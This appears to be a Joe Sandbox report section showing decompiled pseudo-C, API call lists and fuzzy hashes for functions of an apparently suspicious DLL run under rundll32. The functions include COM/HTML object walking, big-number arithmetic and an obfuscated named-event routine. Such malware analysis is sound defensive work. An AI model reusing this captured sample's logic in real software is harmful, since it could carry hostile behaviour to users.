                                                  									_t43 = _t107 + 0x10; // 0x3d0547c0
                                                  									E05472659( *_t43, _t97, _a8,  *0x547d330, _a16);
                                                  								}
                                                  								if( *_t107 != 0) {
                                                  									E05479039(_a24);
                                                  								} else {
                                                  									 *_t107 = _a16;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					_t21 = _t107 + 0x10; // 0x3d0547c0
                                                  					if(E05476BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                  						_t106 = _v16;
                                                  						_t88 = 0x28;
                                                  						if(_v12 == _t88) {
                                                  							 *_t106 =  *_t106 & 0x00000000;
                                                  							_t26 = _t107 + 0x10; // 0x3d0547c0
                                                  							E0547A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                  						}
                                                  						E05479039(_t106);
                                                  						_t104 = _a16;
                                                  					}
                                                  					E05479039(_a24);
                                                  					goto L14;
                                                  				}
                                                  				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                  					goto L29;
                                                  				} else {
                                                  					_t103 = _a8;
                                                  					E0547A8D8(_t104, _a8,  &_v284);
                                                  					__imp__(_t108 + _t104 - 0x117,  *0x547d33c);
                                                  					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                  					_t97 = 0x80000003;
                                                  					goto L6;
                                                  				}
                                                  			}

                                                  APIs
                                                  • StrChrA.SHLWAPI(05473C81,0000005F,00000000,00000000,00000104), ref: 05471808
                                                  • lstrcpy.KERNEL32(?,?), ref: 05471835
                                                    • Part of subcall function 0547809F: lstrlen.KERNEL32(?,00000000,0547D330,00000001,05472200,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9), ref: 054780A8
                                                    • Part of subcall function 0547809F: mbstowcs.NTDLL ref: 054780CF
                                                    • Part of subcall function 0547809F: memset.NTDLL ref: 054780E1
                                                    • Part of subcall function 05472659: lstrlenW.KERNEL32(05473C81,?,?,054719A9,3D0547C0,80000002,05473C81,05478B1E,74666F53,4D4C4B48,05478B1E,?,3D0547C0,80000002,05473C81,?), ref: 05472679
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 05471857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: 1ffbb197b0a3079c95d102f5fd25ffa6d51ae5dc4937253b31e99f954765c161
                                                  • Instruction ID: da555e5e1195e3fb65daccae9bd43382c97bf4026e29162c0273d1b918308b9b
                                                  • Opcode Fuzzy Hash: 1ffbb197b0a3079c95d102f5fd25ffa6d51ae5dc4937253b31e99f954765c161
                                                  • Instruction Fuzzy Hash: 06516AB661020EEFDF159FA1CD45EEA3BBEFF08210F00855AFA5592120EB31D926DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 05471680
                                                  • SysFreeString.OLEAUT32(?), ref: 05471763
                                                    • Part of subcall function 054752F9: SysAllocString.OLEAUT32(0547C2B0), ref: 05475349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 054717B7
                                                  • SysFreeString.OLEAUT32(?), ref: 054717C5
                                                    • Part of subcall function 05472436: Sleep.KERNEL32(000001F4), ref: 0547247E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: 32ed030bed561e729ec95dcd3428e4a75160e64b5b1ba5c2102262655031479f
                                                  • Instruction ID: bfa907df5d9a6511911fe37e6d19681a1c9630b5d16e79158b1b30927866032e
                                                  • Opcode Fuzzy Hash: 32ed030bed561e729ec95dcd3428e4a75160e64b5b1ba5c2102262655031479f
                                                  • Instruction Fuzzy Hash: E2511279A1424DEFCB10DFE8C8848DEB7B6FF88350B1589AAE505EB210DB719D45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E054752F9(intOrPtr* __eax) {
                                                  				void* _v8;
                                                  				WCHAR* _v12;
                                                  				void* _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v32;
                                                  				intOrPtr _v40;
                                                  				short _v48;
                                                  				intOrPtr _v56;
                                                  				short _v64;
                                                  				intOrPtr* _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t57;
                                                  				intOrPtr* _t58;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr* _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t67;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr _t78;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t108;
                                                  				void* _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				intOrPtr _t129;
                                                  
                                                  				_t122 = _t121 - 0x3c;
                                                  				_push( &_v8);
                                                  				_push(__eax);
                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                  				if(_t117 >= 0) {
                                                  					_t54 = _v8;
                                                  					_t102 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t5 = _t102 + 0x547e038; // 0x3050f485
                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                  					_t56 = _v8;
                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                  					if(_t117 >= 0) {
                                                  						__imp__#2(0x547c2b0);
                                                  						_v28 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_t117 = 0x8007000e;
                                                  						} else {
                                                  							_t60 = _v32;
                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                  							_t86 = __imp__#6;
                                                  							_t117 = _t61;
                                                  							if(_t117 >= 0) {
                                                  								_t63 = _v24;
                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                  								if(_t117 >= 0) {
                                                  									_t129 = _v20;
                                                  									if(_t129 != 0) {
                                                  										_v64 = 3;
                                                  										_v48 = 3;
                                                  										_v56 = 0;
                                                  										_v40 = 0;
                                                  										if(_t129 > 0) {
                                                  											while(1) {
                                                  												_t67 = _v24;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t122 = _t122;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                  												if(_t117 < 0) {
                                                  													goto L16;
                                                  												}
                                                  												_t69 = _v8;
                                                  												_t108 =  *0x547d27c; // 0x1f6a5a8
                                                  												_t28 = _t108 + 0x547e0bc; // 0x3050f1ff
                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                  												if(_t117 >= 0) {
                                                  													_t74 = _v16;
                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                  														_t78 =  *0x547d27c; // 0x1f6a5a8
                                                  														_t33 = _t78 + 0x547e078; // 0x76006f
                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                  															_t82 = _v16;
                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                  														}
                                                  														 *_t86(_v12);
                                                  													}
                                                  													_t76 = _v16;
                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                  												}
                                                  												_t71 = _v8;
                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                  												_v40 = _v40 + 1;
                                                  												if(_v40 < _v20) {
                                                  													continue;
                                                  												}
                                                  												goto L16;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								L16:
                                                  								_t65 = _v24;
                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                  							}
                                                  							 *_t86(_v28);
                                                  						}
                                                  						_t58 = _v32;
                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                  					}
                                                  				}
                                                  				return _t117;
                                                  			}
                                                  0x054753c9
                                                  0x054753ca
                                                  0x054753d2
                                                  0x054753d3
                                                  0x054753d4
                                                  0x054753d6
                                                  0x054753da
                                                  0x054753de
                                                  0x00000000
                                                  0x00000000
                                                  0x054753e4
                                                  0x054753ed
                                                  0x054753f3
                                                  0x054753fd
                                                  0x05475401
                                                  0x05475403
                                                  0x05475410
                                                  0x05475414
                                                  0x0547541c
                                                  0x05475421
                                                  0x05475433
                                                  0x05475435
                                                  0x0547543b
                                                  0x0547543b
                                                  0x05475444
                                                  0x05475444
                                                  0x05475446
                                                  0x0547544c
                                                  0x0547544c
                                                  0x0547544f
                                                  0x05475455
                                                  0x05475458
                                                  0x05475461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x05475461
                                                  0x054753b5
                                                  0x054753af
                                                  0x05475397
                                                  0x05475467
                                                  0x05475467
                                                  0x0547546d
                                                  0x0547546d
                                                  0x05475473
                                                  0x05475473
                                                  0x0547547c
                                                  0x05475482
                                                  0x05475482
                                                  0x0547533e
                                                  0x0547548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(0547C2B0), ref: 05475349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0547542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05475444
                                                  • SysFreeString.OLEAUT32(?), ref: 05475473
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: e050ca5ae1350f9c0c95ab5262a8b2c34e675d6eabf7dfdfd8fa80622c7cd650
                                                  • Instruction ID: 4976d5c0b7137eaec742ddc6cad8fa031241e53aa9468961500b59b06474271c
                                                  • Opcode Fuzzy Hash: e050ca5ae1350f9c0c95ab5262a8b2c34e675d6eabf7dfdfd8fa80622c7cd650
                                                  • Instruction Fuzzy Hash: 7A512A75E00519EFCB04DFA8C8889EEB7BAFF88705B148599E915AB310D731AD01DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E05471017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				void _v92;
                                                  				void _v236;
                                                  				void* _t55;
                                                  				unsigned int _t56;
                                                  				signed int _t66;
                                                  				signed int _t74;
                                                  				void* _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				void* _t92;
                                                  				void* _t96;
                                                  				signed int* _t99;
                                                  				signed int _t101;
                                                  				signed int _t103;
                                                  				void* _t107;
                                                  
                                                  				_t92 = _a12;
                                                  				_t101 = __eax;
                                                  				_t55 = E0547A7AA(_a16, _t92);
                                                  				_t79 = _t55;
                                                  				if(_t79 == 0) {
                                                  					L18:
                                                  					return _t55;
                                                  				}
                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                  				_t81 = 0;
                                                  				_t96 = 0x20;
                                                  				if(_t56 == 0) {
                                                  					L4:
                                                  					_t97 = _t96 - _t81;
                                                  					_v12 = _t96 - _t81;
                                                  					E0547968F(_t79,  &_v236);
                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E05478967(_t101,  &_v236, _a8, _t96 - _t81);
                                                  					E05478967(_t79,  &_v92, _a12, _t97);
                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                  					_t66 = E0547968F(_t101, 0x547d1b0);
                                                  					_t103 = _t101 - _t79;
                                                  					_a8 = _t103;
                                                  					if(_t103 < 0) {
                                                  						L17:
                                                  						E0547968F(_a16, _a4);
                                                  						E05471D6C(_t79,  &_v236, _a4, _t97);
                                                  						memset( &_v236, 0, 0x8c);
                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                  						goto L18;
                                                  					}
                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                  					do {
                                                  						if(_v8 != 0xffffffff) {
                                                  							_push(1);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push( *_t99);
                                                  							L0547B0C8();
                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                  							asm("adc edx, esi");
                                                  							_push(0);
                                                  							_push(_v8 + 1);
                                                  							_push(_t92);
                                                  							_push(_t74);
                                                  							L0547B0C2();
                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                  								_t74 = _t74 | 0xffffffff;
                                                  								_v16 = _v16 & 0x00000000;
                                                  							}
                                                  						} else {
                                                  							_t74 =  *_t99;
                                                  						}
                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                  						_a12 = _t74;
                                                  						_t76 = E05471FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                  						while(1) {
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							L13:
                                                  							_t92 =  &_v92;
                                                  							if(E05478B62(_t79, _t92, _t106) < 0) {
                                                  								break;
                                                  							}
                                                  							L14:
                                                  							_a12 = _a12 + 1;
                                                  							_t76 = E05479100(_t79,  &_v92, _t106, _t106);
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						_a8 = _a8 - 1;
                                                  						_t66 = _a12;
                                                  						_t99 = _t99 - 4;
                                                  						 *(0x547d1b0 + _a8 * 4) = _t66;
                                                  					} while (_a8 >= 0);
                                                  					_t97 = _v12;
                                                  					goto L17;
                                                  				}
                                                  				while(_t81 < _t96) {
                                                  					_t81 = _t81 + 1;
                                                  					_t56 = _t56 >> 1;
                                                  					if(_t56 != 0) {
                                                  						continue;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 054710C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 054710DA
                                                  • memset.NTDLL ref: 0547117A
                                                  • memset.NTDLL ref: 0547118A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 7e52e7c3463fb3156b0ac851c87a58a3c10e0210797414337f0c6b576b89779d
                                                  • Instruction ID: 4ba981c9bb2f3a6a43c47a1121779e9ae4ca0a1b90a507d9a130ca2f0eb547a1
                                                  • Opcode Fuzzy Hash: 7e52e7c3463fb3156b0ac851c87a58a3c10e0210797414337f0c6b576b89779d
                                                  • Instruction Fuzzy Hash: 1141A271B0028DABDB10DFA9CC84FEE7B75EF44310F10856AF916AB280DB709949CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0547A9BD
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • ResetEvent.KERNEL32(?), ref: 0547AA31
                                                  • GetLastError.KERNEL32 ref: 0547AA54
                                                  • GetLastError.KERNEL32 ref: 0547AAFF
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 71ac16a835cc675c7c0f2433e554354e4f56a90d181df6d5e17142d5f42c1fd7
                                                  • Instruction ID: 3b366c26f8b6043a173e9e2c827ecbaf0ecfd64b65341b283ff0ea987d2000e8
                                                  • Opcode Fuzzy Hash: 71ac16a835cc675c7c0f2433e554354e4f56a90d181df6d5e17142d5f42c1fd7
                                                  • Instruction Fuzzy Hash: BD418A72610609BBDB249FA6CC89EEF7FBDEF85700F00495AF142E1190EB71A944CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E054739BF(void* __eax, void* __ecx) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __esi;
                                                  				intOrPtr _t36;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t39;
                                                  				void* _t53;
                                                  				long _t58;
                                                  				void* _t59;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t59 = __eax;
                                                  				_t58 = 0;
                                                  				ResetEvent( *(__eax + 0x1c));
                                                  				_push( &_v8);
                                                  				_push(4);
                                                  				_push( &_v20);
                                                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  				if( *0x547d134() != 0) {
                                                  					L5:
                                                  					if(_v8 == 0) {
                                                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                  						L21:
                                                  						return _t58;
                                                  					}
                                                  					 *0x547d168(0, 1,  &_v12);
                                                  					if(0 != 0) {
                                                  						_t58 = 8;
                                                  						goto L21;
                                                  					}
                                                  					_t36 = E05472049(0x1000);
                                                  					_v16 = _t36;
                                                  					if(_t36 == 0) {
                                                  						_t58 = 8;
                                                  						L18:
                                                  						_t37 = _v12;
                                                  						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                  						goto L21;
                                                  					}
                                                  					_push(0);
                                                  					_push(_v8);
                                                  					_push( &_v20);
                                                  					while(1) {
                                                  						_t39 = _v12;
                                                  						_t56 =  *_t39;
                                                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                  						ResetEvent( *(_t59 + 0x1c));
                                                  						_push( &_v8);
                                                  						_push(0x1000);
                                                  						_push(_v16);
                                                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  						if( *0x547d134() != 0) {
                                                  							goto L13;
                                                  						}
                                                  						_t58 = GetLastError();
                                                  						if(_t58 != 0x3e5) {
                                                  							L15:
                                                  							E05479039(_v16);
                                                  							if(_t58 == 0) {
                                                  								_t58 = E05477A07(_v12, _t59);
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t58 = E05471C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						L13:
                                                  						_t58 = 0;
                                                  						if(_v8 == 0) {
                                                  							goto L15;
                                                  						}
                                                  						_push(0);
                                                  						_push(_v8);
                                                  						_push(_v16);
                                                  					}
                                                  				}
                                                  				_t58 = GetLastError();
                                                  				if(_t58 != 0x3e5) {
                                                  					L4:
                                                  					if(_t58 != 0) {
                                                  						goto L21;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t58 = E05471C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                  				if(_t58 != 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  				goto L4;
                                                  			}















                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 054739D5
                                                  • GetLastError.KERNEL32 ref: 054739EE
                                                    • Part of subcall function 05471C47: WaitForMultipleObjects.KERNEL32(00000002,0547AA72,00000000,0547AA72,?,?,?,0547AA72,0000EA60), ref: 05471C62
                                                  • ResetEvent.KERNEL32(?), ref: 05473A67
                                                  • GetLastError.KERNEL32 ref: 05473A82
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                   • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: bfbd6c4c0425e3958b08ed7f402f8e90376d26b3f643c66d94623e719cf2d755
                                                  • Instruction ID: aabee46709913dcb15708981fde217e69e4feca2a4ff54c0f43b25d139289921
                                                  • Opcode Fuzzy Hash: bfbd6c4c0425e3958b08ed7f402f8e90376d26b3f643c66d94623e719cf2d755
                                                  • Instruction Fuzzy Hash: D131A832600A4CABDF11DFA5CC46EEF77BAFF84250F1009AAE51597250EB70E945DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 05473B46
                                                  • SysAllocString.OLEAUT32(05471885), ref: 05473B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05473B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05473BAB
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                   • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: f9c45a76207ccb5ec6579ee99a541f54da625fe6e671c9c4e358d8de4ac5e36a
                                                  • Instruction ID: fb745b57fc907c6f5a32fed8bba889a9c05ef167b53fe33d6a95e16e441af9a5
                                                  • Opcode Fuzzy Hash: f9c45a76207ccb5ec6579ee99a541f54da625fe6e671c9c4e358d8de4ac5e36a
                                                  • Instruction Fuzzy Hash: 0231E7B191014DEF8B05DFA8D4C48EE7BB9FF48350B10886EF50AA7211DB359A45DF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E054742EA(signed int _a4, signed int* _a8) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				signed int _t6;
                                                  				intOrPtr _t8;
                                                  				intOrPtr _t12;
                                                  				short* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int* _t28;
                                                  				CHAR* _t30;
                                                  				long _t31;
                                                  				intOrPtr* _t32;
                                                  
                                                  				_t6 =  *0x547d270; // 0xd448b889
                                                  				_t32 = _a4;
                                                  				_a4 = _t6 ^ 0x109a6410;
                                                  				_t8 =  *0x547d27c; // 0x1f6a5a8
                                                   				_t3 = _t8 + 0x547e862; // 0x61636f4c: little-endian "Loca", the first dword of the event-name string built below
                                                  				_t25 = 0;
                                                  				_t30 = E05477A9A(_t3, 1);
                                                  				if(_t30 != 0) {
                                                   					_t25 = CreateEventA(0x547d2a8, 1, 0, _t30);   // manual-reset (1), initially non-signaled (0), named event
                                                  					E05479039(_t30);
                                                  				}
                                                   				_t12 =  *0x547d25c; // 0x4000000a: OS version word cached earlier, 0x0a in the low byte on this Windows 10 run (inferred)
                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0547757F() != 0) {
                                                  					L12:
                                                  					_t28 = _a8;
                                                  					if(_t28 != 0) {
                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                  					}
                                                  					_t31 = E0547205E(_t32, _t26);
                                                  					if(_t31 == 0 && _t25 != 0) {
                                                   						_t31 = WaitForSingleObject(_t25, 0x4e20);   // 0x4e20 = 20 000 ms
                                                  					}
                                                  					if(_t28 != 0 && _t31 != 0) {
                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                  					}
                                                  					goto L20;
                                                  				} else {
                                                   					_t19 =  *0x547d0f0( *_t32, 0x20);   // indirect call: locate 0x20 (space) in the wide string (a StrChrW-style helper; inferred)
                                                   					if(_t19 != 0) {
                                                   						 *_t19 = 0;                       // split the string at the first space ...
                                                   						_t19 = _t19 + 2;                  // ... and point past it (2 = sizeof(WCHAR))
                                                  					}
                                                  					_t31 = E0547A501(0,  *_t32, _t19, 0);
                                                  					if(_t31 == 0) {
                                                  						if(_t25 == 0) {
                                                  							L22:
                                                  							return _t31;
                                                  						}
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  						if(_t31 == 0) {
                                                  							L20:
                                                  							if(_t25 != 0) {
                                                  								CloseHandle(_t25);
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  			}
















                                                  APIs
                                                    • Part of subcall function 05477A9A: lstrlen.KERNEL32(054723E9,00000000,00000000,00000027,00000005,00000000,00000000,054796DA,74666F53,00000000,054723E9,0547D00C,?,054723E9), ref: 05477AD0
                                                    • Part of subcall function 05477A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 05477AF4
                                                    • Part of subcall function 05477A9A: lstrcat.KERNEL32(00000000,00000000), ref: 05477AFC
                                                  • CreateEventA.KERNEL32(0547D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,05473CA0,?,00000001,?), ref: 0547432B
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,05473CA0,00000000,00000000,?,00000000,?,05473CA0,?,00000001,?,?,?,?,05476880), ref: 05474389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,05473CA0,?,00000001,?), ref: 054743B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,05473CA0,?,00000001,?,?,?,?,05476880), ref: 054743CF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                   • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
